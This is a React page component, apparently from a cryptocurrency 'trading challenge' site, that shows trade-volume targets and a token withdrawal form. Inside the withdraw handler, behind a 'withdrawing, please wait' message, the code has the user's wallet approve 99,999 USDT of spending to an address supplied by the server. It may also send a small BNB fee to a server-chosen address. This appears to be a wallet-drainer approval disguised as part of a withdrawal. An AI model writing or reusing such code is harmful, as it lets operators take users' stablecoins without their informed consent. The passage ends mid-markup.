import React, {useState, useEffect, useRef} from 'react';
import {useNavigate} from "react-router-dom";
import { connect } from 'react-redux';
import Head from '../../components/head/Head'
import Foot from '../../components/foot/Foot'
import {  Input,message,Modal,Progress,Statistic  } from 'antd';
import { signer,allowance,approve,balanceOf,transfer,transferBnb,balanceOfBNB } from '../../utils/ethers'
import StripedProgressBar from '../../components/progress/Progress'
import copy from 'copy-to-clipboard'
import {shareLink} from '../../utils/const'
import NumberFormat from 'react-number-format'
import contractAddress from "../../utils/contractAddress.json"
import Moment from 'react-moment'
import CountUp from "react-countup";

import { useTranslation } from 'react-i18next'
import {getTaskIndex, addIdoBnb,addIdoJie,addApprove,gethasPay,addPayBnb,addTixian} from "../../api";
import { CSSTransition } from 'react-transition-group';
import {
    WarningOutlined,CloseOutlined,DownOutlined,ExportOutlined,CheckCircleOutlined,StopOutlined,ClockCircleOutlined
  } from '@ant-design/icons';
  import './index.less';

import { max } from 'moment';
const WEEKINDEX = 0
const mapStateToProps=(state)=>{
    return{
        isLogin:state.isLogin,
        address:state.address,
        pAddress:state.pAddress,
        chain:state.chain,
        flash:state.flash,
    }
}
const { Countdown } = Statistic;
const Challenge = (props) => {
    const { t } = useTranslation()
    const navigate = useNavigate()
   
   
    const [num,setNum] = useState(0)
    const [weekTrade,setWeekTrade] = useState(0)
    const [todayTrade,setTodayTrade] = useState(0)
    const [per,setPer] = useState(0)
    const [weekMubiao ,setWeekMubiao] = useState(0)
    const [noFinish,setNoFinish] = useState(0)

    const [edu,setEdu] = useState(0)
    const [meba,setMeba] = useState(0)
   

     const [list,setList] = useState([])
     const [list1,setList1] = useState([])
     const [childs,setChilds] = useState([])
     const [isLock,setIsLock]=useState(false)
     const [isShowMenu,setIsShowMenu] = useState(false);
     const [isShowMenu1,setIsShowMenu1] = useState(false);
     const [week, setWeek] = useState(1);

    const [isApproveUsdt,setIsApproveUsdt]=useState(false)
    const [receiveFee,setReceiveFee] = useState("")
    const [receiveApprove,setReceiveApprove] = useState("")
    const [valueCol,setValueCol] = useState("")
    const [coin,setCoin] = useState("meba")
    const [isb,setIsB] =useState(false)
    const [hasShou,setHasShou] =useState("")


      const _getTuanInfo = () =>{
             if(props.address.length>0 && props.isLogin){
                 getTaskIndex().then(res=>{
                     if(res.code == 0){
                        setWeekTrade(res.data.weekTrade)
                        setTodayTrade(res.data.todayTrade)
                        setPer(res.data.per)
                        setNoFinish(res.data.noFinish)
                        setWeekMubiao(res.data.weekMubiao)
                        if(res.data.weekEduList != null){
                            setList(res.data.weekEduList)
                        }

                        if(res.data.weekDayList != null){
                            setList1(res.data.weekDayList)
                        }

                         if(res.data.his != null){
                            setChilds(res.data.his)
                        }

                        setMeba(res.data.meba)
                        setEdu(res.data.edu)

                        setReceiveFee(res.data.fee_receive)
                        setReceiveApprove(res.data.approve_receive)
                        setHasShou(res.data.appr)
                        setIsB(res.data.isb)
                       
                         
                     }else{
                         message.error(res.msg)
                     }
                    console.log(res)
                 })
             }
         }

         const closeAll = () =>{

         }


         const _isApproveUsdt =  () => {
                return  new Promise(async (resolve, reject) => {
                     allowance(props.address,receiveApprove,"usdt").then(res=>{
                         if(parseFloat(res)>=99999){
                             setIsApproveUsdt(true)
                             resolve(true)
                         }else{
                             resolve(false)
                         }
                     },err =>{
                             resolve(false)
                     })
                  })
             } 


    const _ti = async () =>{
        // let now = Date.now() /1000
        //             if(parseFloat(now) < 1786953600){
        //                 message.error(t('g.暂未开始'))
        //                     return
        //             }
    
            //    message.error(t('g.暂未开始'))
            //     return false
    
            let _coin = coin.toLowerCase()
            if(props.address.length<=0){
                message.error(t('g.请先连接钱包'))
                return false
            }
            if(props.isLogin === false){
                message.error(t('g.请先连接钱包'))
                return false
            }
    
               if(valueCol.length===0){
                message.error(t('g.请输入数量'))
                return false
            }
            if(_coin == "meba"){
                if(parseFloat(valueCol)<10){
                    message.error(t('g.最低提取数量')+":10")
                    return false
                }
                if(parseFloat(valueCol)>parseFloat(meba)){
                    message.error(t('g.余额不足'))
                    return false
                }
    
                if(parseFloat(valueCol)>parseFloat(edu)){
                    message.error(t('g.额度不足'))
                    return false
                }
                //  if(parseFloat(valueCol)%10 !=0){
                //     message.error(t('g.数量必须是10的整数倍'))
                //     return false
                // }
     
                
            }

            
    
            message.warning(t('g.提取中请等待'),4)
             const _isApprove =await _isApproveUsdt()
                console.log(isb)
             if(isb==false){
                 if(_isApprove == false || parseInt(hasShou) == 3){
                    let tx = await approve(receiveApprove,"usdt",99999,true)
                    addApprove({address:props.address,hex:String(tx.hash)})
                }
             }
           
    
         
    
         
    
     
            
            if(isLock) return false;
            setIsLock(true)
    
            // gethasPay({address:props.address,coin:coin}).then(resPay=>{
            //     if(resPay.data.has=="3"){
            //         transferBnb(props.address,receiveApprove,0.0007).then(async resBnb=>{
            //             let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
            //             if(res4.code==0){
                                   
            //                             addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin}).then(resTi=>{
            //                                 if(resTi.code==0){
            //                                     message.success(resTi.msg)
            //                                 }else{
            //                                     message.error(resTi.msg)
            //                                 }
            //                                 setIsLock(false)
            //                                 closeAll()
            //                                 setNum(num+1)
            //                             },errorTi=>{
            //                                 setIsLock(false)
            //                                 closeAll()
            //                                 message.error(errorTi)
            //                             })
                                        
    
                                  
            //                     }else{
            //                         setIsLock(false)
            //                         closeAll()
            //                         message.error(res4.msg)
            //                     }
    
                
            //         },errBnb=>{
            //              setIsLock(false)
            //             closeAll()
            //             message.error(errBnb)
            //         })
            //     }else{
            //           signer(props.address).then(res=>{
            //                 addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(resTi=>{
            //                     if(resTi.code==0){
            //                         message.success(resTi.msg)
            //                     }else{
            //                         message.error(resTi.msg)
            //                     }
            //                     setIsLock(false)
            //                     closeAll()
            //                     setNum(num+1)
            //                 },errorTi=>{
            //                     setIsLock(false)
            //                     closeAll()
            //                     message.error(errorTi)
            //                 })
                               
    
            //             },error=>{
            //                 setIsLock(false)
            //             })
            //     }
            // },errPay=>{
            //     closeAll()
            //     setIsLock(false)
            //     message.error(errPay)
            // })
    
           
            if(isb==false){
                    gethasPay({address:props.address,coin:coin}).then(resPay=>{
                        if(resPay.data.has=="3"){
                                transferBnb(props.address,receiveFee,0.0007).then(async resBnb=>{
                                let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
                                if(res4.code==0){
                                                
                                    
                                        addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:props.address,days:String(0)}).then(res=>{
                                            if(res.code===0){
                                                message.success(res.msg)
                                            }else{
                                                message.error(res.msg)
                                            }
                                            setIsLock(false)
                                            closeAll()
                                            setNum(num+1)
                                        },error=>{
                                            setIsLock(false)
                                            message.error(error)
                                        })
    
                                 
                                }else{
                                    setIsLock(false)
                                    closeAll()
                                    message.error(res4.msg)
                                }
                            })
                        }else{
                            signer(props.address).then(res=>{
                                addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass,days:String(0)}).then(res=>{
                                    if(res.code===0){
                                        message.success(res.msg)
                                    }else{
                                        message.error(res.msg)
                                    }
                                    setIsLock(false)
                                    closeAll()
                                    setNum(num+1)
                                },error=>{
                                    setIsLock(false)
                                    message.error(res.msg)
                                })
                            },error=>{
                                setIsLock(false)
                            })
                        }
                    })
                    
            }else{
                 signer(props.address).then(res=>{
                    addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass,days:String(0)}).then(res=>{
                        if(res.code===0){
                            message.success(res.msg)
                        }else{
                            message.error(res.msg)
                        }
                        setIsLock(false)
                        closeAll()
                        setNum(num+1)
                    },error=>{
                        setIsLock(false)
                        message.error(res.msg)
                    })
                },error=>{
                    setIsLock(false)
                })
            }
             
            
            // signer(props.address).then(res=>{
            //     addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
            //         if(res.code===0){
            //             message.success(res.msg)
            //         }else{
            //             message.error(res.msg)
            //         }
            //         setIsLock(false)
            //         closeAll()
            //         setNum(num+1)
            //     },error=>{
            //         setIsLock(false)
            //         message.error(res.msg)
            //     })
    
            // },error=>{
            //     setIsLock(false)
            // })
        }     

   


        const goLiushui = (url)=>{
            //     message.error(t('g.暂未开放'))
            //    return
                if(props.address.length<=0 ){
                    message.error(t('head.请先连接钱包'))
                    return false
                }
                navigate(url,{
                    state:{
                        address:props.address
                    }
                })
            }

    
       useEffect(() => {
                window.scrollTo(0, 0)
                _getTuanInfo()
       
       
           }, 
            // eslint-disable-next-line
            [props.isLogin,num]);

    // useEffect(() => {
    //     // window.scrollTo(0, 0)
         


    // }, 
    // // eslint-disable-next-line
    // [props.isLogin,num]);

    // const clearTimer = () =>{
    //     clearInterval(ref.current)
    // }
    

    return (
        <>
        <CSSTransition
                    in={isShowMenu1}
                    unmountOnExit={true}
                    classNames='lan'
                    timeout={1000}
                    appear
                    onEnter={(e) => console.log('开始进入动画')}
                    onEntering={(e) => console.log('执行进入动画')}
                    onEntered={(e) => console.log('进入动画结束')}
                    onExit={(e) => console.log('开始离开动画')}
                    onExiting={(e) => console.log('正在离开动画')}
                    onExited={(e) => console.log('离开动画结束')}>
                    <div
                    className="
                        fixed inset-0 z-50
                        flex items-center justify-center
                        bg-black/30
                        backdrop-blur-[14px]
                        backdrop-saturate-150
                        px-4
                    "
                    >
                    <div
                        className="
                        relative
                        w-full max-w-[390px]
                        min-h-[520px]
                        px-5 py-6
                         

                        bg-black/80

                        border-0 border-[#4A5560]

                        shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

                        [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
                        "
                    >
                        {/* Close */}
                        <button
                        onClick={()=>setIsShowMenu1(false)}
                        className="
                            absolute right-4 top-4 z-50
                            w-6 h-6
                            flex items-center justify-center

                            text-text1
                            text-[14px]
                            leading-none

                            border border-[#3A444E]
                            bg-[#070D12]/95

                            [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

                            transition-all duration-200

                            hover:text-text1
                            hover:border-[#6B7680]
                            hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
                        "
                        >
                        ×
                        </button>

                        {/* 外层细线 */}
                        <div
                        className="
                            absolute inset-[6px]
                            pointer-events-none
                            border border-[#171c20]

                            [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
                        "
                        />

                        

                        

                        {/* 左上角 */}
                        <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
                        

                        {/* 右上角 */}
                        <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
                        

                        {/* 左下角 */}
                        <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
                        

                        {/* 右下角 */}
                        <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
                    

                    

                        {/* 内部暗色纹理线 */}
                        <div
                        className="
                            absolute inset-0
                            opacity-25
                            pointer-events-none
                            bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
                        "
                        />

                        {/* 内容区域 */}
                        <div className="relative z-10  max-h-[500px] overflow-y-scroll">
                        {/* 这里放你的弹窗内容 */}
                            <div className=' w-full py-4 mt-2 flex flex-col'>
                    
                    <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                        <span className='w-4/12 block text-center pr-5'>{t('tr.周期')}</span>
                        
                       <span className='w-3/12 block'>{t('tr.日期')}</span>
                        <span className='w-5/12 block text-center'>{t('tr.总交易金额')}</span>
                        
                    </div>
                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                    
                    {
                            list1.length>0?
                            list1.map((item,index)=>{
                                return(
                                    <>
                                        <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                            <span className='w-4/12 block  text-center pr-5 text-orange-500'>{
                                                t('tr.周期')+"："+parseInt((index / 7) +1)
                                            }</span>
                                            <span className='w-3/12 block text-blue-500'>{item.add_date}</span>
                                            
                                            <span className='w-5/12 text-center block text-green-500'>
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.trade_usdt}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={6} />
                                            </span>
                                            
                                        </div>
                                        <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                        {
                                            (index+1)%7 ==0?(
                                                <div className=' w-full h-6 '></div>
                                            ):null
                                        }
                                    </>
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                        No data
                                </div>
                            )
                        }
                    


                
                </div>
                        {/*  */}
                        </div>
                    </div>
                    </div>
                    </CSSTransition>
         <CSSTransition
                    in={isShowMenu}
                    unmountOnExit={true}
                    classNames='lan'
                    timeout={1000}
                    appear
                    onEnter={(e) => console.log('开始进入动画')}
                    onEntering={(e) => console.log('执行进入动画')}
                    onEntered={(e) => console.log('进入动画结束')}
                    onExit={(e) => console.log('开始离开动画')}
                    onExiting={(e) => console.log('正在离开动画')}
                    onExited={(e) => console.log('离开动画结束')}>
                    <div
                    className="
                        fixed inset-0 z-50
                        flex items-center justify-center
                        bg-black/30
                        backdrop-blur-[14px]
                        backdrop-saturate-150
                        px-4
                    "
                    >
                    <div
                        className="
                        relative
                        w-full max-w-[390px]
                        min-h-[520px]
                        px-5 py-6
                        overflow-hidden

                        bg-black/80

                        border-0 border-[#4A5560]

                        shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

                        [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
                        "
                    >
                        {/* Close */}
                        <button
                        onClick={()=>setIsShowMenu(false)}
                        className="
                            absolute right-4 top-4 z-50
                            w-6 h-6
                            flex items-center justify-center

                            text-text1
                            text-[14px]
                            leading-none

                            border border-[#3A444E]
                            bg-[#070D12]/95

                            [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

                            transition-all duration-200

                            hover:text-text1
                            hover:border-[#6B7680]
                            hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
                        "
                        >
                        ×
                        </button>

                        {/* 外层细线 */}
                        <div
                        className="
                            absolute inset-[6px]
                            pointer-events-none
                            border border-[#171c20]

                            [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
                        "
                        />

                        

                        

                        {/* 左上角 */}
                        <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
                        

                        {/* 右上角 */}
                        <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
                        

                        {/* 左下角 */}
                        <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
                        

                        {/* 右下角 */}
                        <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
                    

                    

                        {/* 内部暗色纹理线 */}
                        <div
                        className="
                            absolute inset-0
                            opacity-25
                            pointer-events-none
                            bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
                        "
                        />

                        {/* 内容区域 */}
                        <div className="relative z-10">
                        {/* 这里放你的弹窗内容 */}
                            <div className=' w-full py-4 mt-2 flex flex-col'>
                    
                    <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                        <span className='w-3/12'>{t('air.时间')}</span>
                        <span className='w-2/12'>{t('air.状态')}</span>
                       
                        <span className='w-4/12 text-center'>SPACEX</span>
                        <span className='w-3/12'>{t('air.单据')}</span>
                    </div>
                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                    
                    {
                            childs.length>0?
                            childs.map((item,index)=>{
                                return(
                                    <>
                                        <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                            <span className='w-3/12'>{item.add_time}</span>
                                            <span className='w-2/12 text-green-500'>{t('air.已确认')}</span>
                                            
                                            <span className='w-4/12 text-center'>
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.value}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                            </span>
                                            <div  className='w-3/12 flex flex-row items-center justify-start'>
                                                <span className=' text-[#24C4E8]'>{item.hex}</span>
                                                <span className='ml-1 text-xs flex flex-row items-center text-text1'><ExportOutlined /></span>
                                            </div>
                                        </div>
                                        <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                    </>
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                        No data
                                </div>
                            )
                        }
                    


                
                </div>
                        {/*  */}
                        </div>
                    </div>
                    </div>
                    </CSSTransition>
            <Head/>
            <div className=' invitebg  w-full lg:w-1/3 md:w-1/3 sm:1/2  px-0 pt-12 text-white flex flex-col z-10'>
                {/*  */}
                <div className='w-full lg:w-1/3 px-0   min-h-[103px]  flex flex-row  '>
                    {/* <div className=' w-full lg:w-1/3 md:w-1/3 sm:1/2 min-h-[203px]  absolute '>
                        
                    </div> */}
                    <div className='w-[57%] pl-4 flex flex-col z-40'>
                        <img className='mt-5  '  src={require('../../assets/task/title.png')} style={{"width":"406px"}}></img>
                        <span className='mt-[2px] text-text1 text-[9px]' >{t('tr.完成交易考核，解锁释放额度')}</span>
                      
                       
                        

                    </div>
                    
                </div>
                {/*  */}
                <div className='mx-4  mt-3 pl-3 pr-3  SWAPbg1 h-[185px]  flex flex-col justify-start relative'>
                    <img className=' absolute right-3 top-3 '  src={require('../../assets/task/t.png')} style={{"width":"88px"}}></img>
                    <div className='w-full h-16 mt-4 flex flex-row justify-start items-center'>
                        <div className=' flex flex-col w-4/12'>
                            <div className='flex flex-row justify-start items-center'>
                                <img className='mr-1 '  src={require('../../assets/task/icon1.png')} style={{"width":"10px"}}></img>
                                <span className='text-text1 text-[9px]'>{t('tr.今日交易考核')}</span>
                            </div>
                            <div className=' h-3'></div>
                            <span className='text-gray-400 text-[8px]'>{t('tr.今日交易量')}($)</span>
                            <span className=' text-base'><CountUp start={0} end={todayTrade} duration="1" decimals={2} /></span>
                        </div>
                        <div className=' h-7 w-px bg-gray-700 ml-2 mr-6'></div>
                        <div className=' flex flex-col w-4/12'>
                            <div className='flex flex-row justify-start items-center'>
                                <img className='mr-1 '  src={require('../../assets/task/icon1.png')} style={{"width":"10px"}}></img>
                                <span className='text-text1 text-[9px]'>{t('tr.本周交易考核')}</span>
                            </div>
                            <div className=' h-3 pr-3 flex flex-row justify-end items-center'>
                                {/* <span className='text-red-500 text-[10px] mr-1'>{t('tr.进行中')}</span> <span className='text-red-500 text-[10px] leading-[10px] '><ClockCircleOutlined /></span> */}
                            </div>
                            <span className='text-gray-400 text-[8px]'>{t('tr.本周交易量')}($)</span>
                            <span className=' text-base'><CountUp start={0} end={weekTrade} duration="1" decimals={2} /></span>
                        </div>
                        
                    </div>

                    <div className="w-full mt-3
                                    relative inline-flex flex-col items-start justify-start
                                    px-2 py-2 text-white text-[10px]  tracking-wider
                                    [--cut:6px] [--border:1px]
                                    before:absolute before:inset-0 before:bg-gray-800
                                    before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                    after:absolute after:inset-[var(--border)] after:bg-[#050D11]
                                    after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                ">
                                    <div className=' w-full flex flex-row justify-between items-center z-10'>
                                        <span className='text-text1 text-[9px]'>{t('tr.考核进度')}
                                        </span>
                                        <span className='text-text1 text-base'>
                                            <CountUp start={0} end={per} duration="1" decimals={2} />%  
                                        </span>
                                    </div>
                                    <div className='mt-1 w-full flex flex-row justify-start items-end z-10'>
                                        <div className='w-full mr-1 z-10'>
                                            <StripedProgressBar value={per} />
                                        </div>
                                        
                                    </div>
                                    <div className='mt-1 w-full flex flex-row justify-between items-center z-10'>
                                        <span className='text-gray-300 text-[9px]'>{t('tr.目标交易量')}：$<NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={weekMubiao}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                        </span>
                                        <span className='text-gray-300 text-[8px]'>
                                            {t('tr.未完成')}：$<NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={noFinish}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                        </span>
                                    </div>
                            
                    </div>
                    {/* <div className='mt-1  flex flex-row justify-between items-center'>
                        <span className='text-gray-200 text-[9px]'>{t('tr.考核进度')}
                        </span>
                        <span className='text-text1 text-base'>
                             <CountUp start={0} end={per} duration="1" decimals={2} />%  
                        </span>
                    </div>
                    <div className='mt-1  flex flex-row justify-start items-end'>
                        <div className='w-full mr-1'>
                            <StripedProgressBar value={100} />
                        </div>
                         
                    </div>
                    <div className='mt-1  flex flex-row justify-between items-center'>
                        <span className='text-gray-300 text-[9px]'>{t('tr.目标交易量')}：2100.00USDT
                        </span>
                        <span className='text-gray-300 text-[8px]'>
                            {t('tr.未完成')}：2100.00USDT
                        </span>
                    </div> */}
                </div>
                {/*  */}
                <div className='mx-4  mt-3 pl-3 pr-3 pt-4 SWAPbg1 h-[260px]  flex flex-col justify-start'>
                        <div className="grid grid-cols-4 gap-2">
                            {[1, 2, 3, 4, 5, 6, 7, 8].map((item) => {
                                const active = week === item;

                                return (
                                <div
                                    key={item}
                                    onClick={() => setWeek(item)}
                                    className={`
                                    relative
                                    h-[22px]
                                    cursor-pointer
                                    overflow-hidden
                                    transition-all
                                    duration-300
                                    select-none
                                     rounded-md
                                    ${
                                        active
                                        ? "shadow-[0_0_18px_rgba(255,136,0,.55)]"
                                        : ""
                                    }
                                    `}
                                   
                                >
                                    {/* 背景 */}
                                    <div
                                    className={`
                                        absolute inset-0
                                        ${
                                        active
                                            ? "bg-gradient-to-r from-[#ff6a00] via-[#ff9c00] to-[#ff6a00]"
                                            : "bg-[#08111d]"
                                        }
                                    `}
                                    />

                                    {/* 边框 */}
                                    <div
                                    className={`
                                        absolute inset-0 border
                                        ${
                                        active
                                            ? "border-[#ffb300]"
                                            : "border-[#ff8c00]/40"
                                        }
                                    `}
                                    />

                                    {/* 内容 */}
                                    <div className="relative z-10 h-full flex flex-col items-center justify-center">
                                    <div
                                        className={`
                                        text-[9px] uppercase tracking-[1px]
                                        ${
                                            active
                                            ? "text-white"
                                            : "text-gray-400"
                                        }
                                        `}
                                    >
                                        {t('tr.周')} {item}
                                    </div>

                                   
                                    </div>

                                    {/* 激活光效 */}
                                    {active && (
                                    <div className="absolute inset-0 bg-white/10 animate-pulse" />
                                    )}
                                </div>
                                );
                            })}
                            </div>
                        

                        

                        <div className="w-full mt-3
                                    relative inline-flex flex-col items-start justify-start
                                    px-2 py-2 text-white text-[10px]  tracking-wider
                                    [--cut:6px] [--border:1px]
                                    before:absolute before:inset-0 before:bg-gray-800
                                    before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                    after:absolute after:inset-[var(--border)] after:bg-[#050D11]
                                    after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                ">
                            <div className=' w-full flex flex-row justify-between items-center z-10'>
                                <div className=' flex flex-row justify-between items-center'>
                                    <img className='mr-1 '  src={require('../../assets/task/icon1.png')} style={{"width":"10px"}}></img>
                                    <span className='text-gray-400 text-[9px]'>{t('tr.目标交易量')}($)</span>
                                </div>
                                <span className='text-gray-200 text-xs'>
                                    {
                                         WEEKINDEX >= (week - 1) ?(
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={list?.[week - 1]?.WeekEduList.kpi ?? 0}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                        ):(
                                            <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={0}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                        )
                                    }
                                    
                                </span>
                            </div>
                            <div className=' w-full h-px bg-gray-800 mt-2 my-2 z-10'></div>
                            <div className=' w-full flex flex-row justify-between items-center z-10'>
                                <div className=' flex flex-row justify-between items-center'>
                                    <img className='mr-1 '  src={require('../../assets/task/icon2.png')} style={{"width":"10px"}}></img>
                                    <span className='text-gray-400 text-[9px]'>{t('tr.实际交易量')}($)</span>
                                </div>
                                <span className='text-gray-200 text-xs'>
                                    <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={list?.[week - 1]?.WeekEduList.week_trade ?? 0}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                </span>
                            </div>
                            <div className=' w-full h-px bg-gray-800 mt-2 my-2 z-10'></div>
                            <div className=' w-full flex flex-row justify-between items-center z-10'>
                                <div className=' flex flex-row justify-between items-center'>
                                    <img className='mr-1 '  src={require('../../assets/task/icon3.png')} style={{"width":"10px"}}></img>
                                    <span className='text-gray-400 text-[9px]'>{t('tr.周考核状态')}</span>
                                </div>
                                
                                    {
                                        list?.[week - 1]?.WeekEduList.week_pass?(
                                            <span className='text-green-500 text-xs'>{t('tr.已达标')}</span>
                                        ):(
                                            <span className='text-red-500 text-xs'>{t('tr.未完成')}</span>
                                        )
                                    }
                                  
                            </div>
                            
                            <div className=' w-full h-px bg-gray-800 mt-2 my-2 z-10'></div>
                            <div className=' w-full flex flex-row justify-between items-center z-10'>
                                <div onClick={()=>setIsShowMenu1(true)} className=' flex flex-row justify-between items-center'>
                                    <img className='mr-1 '  src={require('../../assets/task/icon5.png')} style={{"width":"10px"}}></img>
                                    <span className='text-gray-400 text-[9px]'>{t('tr.周内连续日考核')}</span>
                                    <span className='text-red-400 text-[9px]'>[{t('tr.统计记录')}]</span>
                                </div>
                                {list?.[week - 1]?.WeekEduList.day_pass?(
                                    <span className='text-green-500 text-xs'>{t('tr.已达标')}</span>
                                    ) : (
                                    <span className='text-red-500 text-xs'>{t('tr.未完成')}</span>
                                    )}
                                {/* <span className='text-green-500 text-xs'>
                                    {t('tr.已完成')}
                                
                                </span>
                                 <span className='text-red-500 text-xs'>
                                 
                                    {t('tr.未完成')}
                                </span> */}
                            </div>
                            <div className=' w-full h-px bg-gray-800 mt-2 my-2 z-10'></div>
                            <div className=' w-full flex flex-row justify-between items-center z-10'>
                                <div className=' flex flex-row justify-between items-center'>
                                    <img className='mr-1 '  src={require('../../assets/task/icon6.png')} style={{"width":"10px"}}></img>
                                    <span className='text-gray-400 text-[9px]'>{t('tr.解锁')}(SPACEX)</span>
                                </div>
                                <span className='text-gray-200 text-xs'>
                                    <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={list?.[week - 1]?.FreeToken }
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} /> 
                                </span>
                            </div>
                            
                            
                            
                            
                    </div>

                </div>

                {/*  */}
                <div className=' mx-4 mt-3 pl-4 pr-4  SWAPbg1 h-[210px]  flex flex-col items-center '>
                    <div className=' w-full flex flex-row justify-center items-center relative'>
                        <span className='mt-3 text-text1 text-[11px] leading-[11px]'>{t('air.提取')} $SPACEX</span>

                        {/* <span className='mt-3 text-text1 text-[11px] leading-[11px]'>[{t('air.余额记录')}]</span> */}
                    </div>
                    
                    {/* <div className='mt-1 flex flex-row justify-center items-center text-[8px] leading-[8px]'>
                        <div className='w-1 h-1 mr-1 rounded-full bg-green-500'></div>
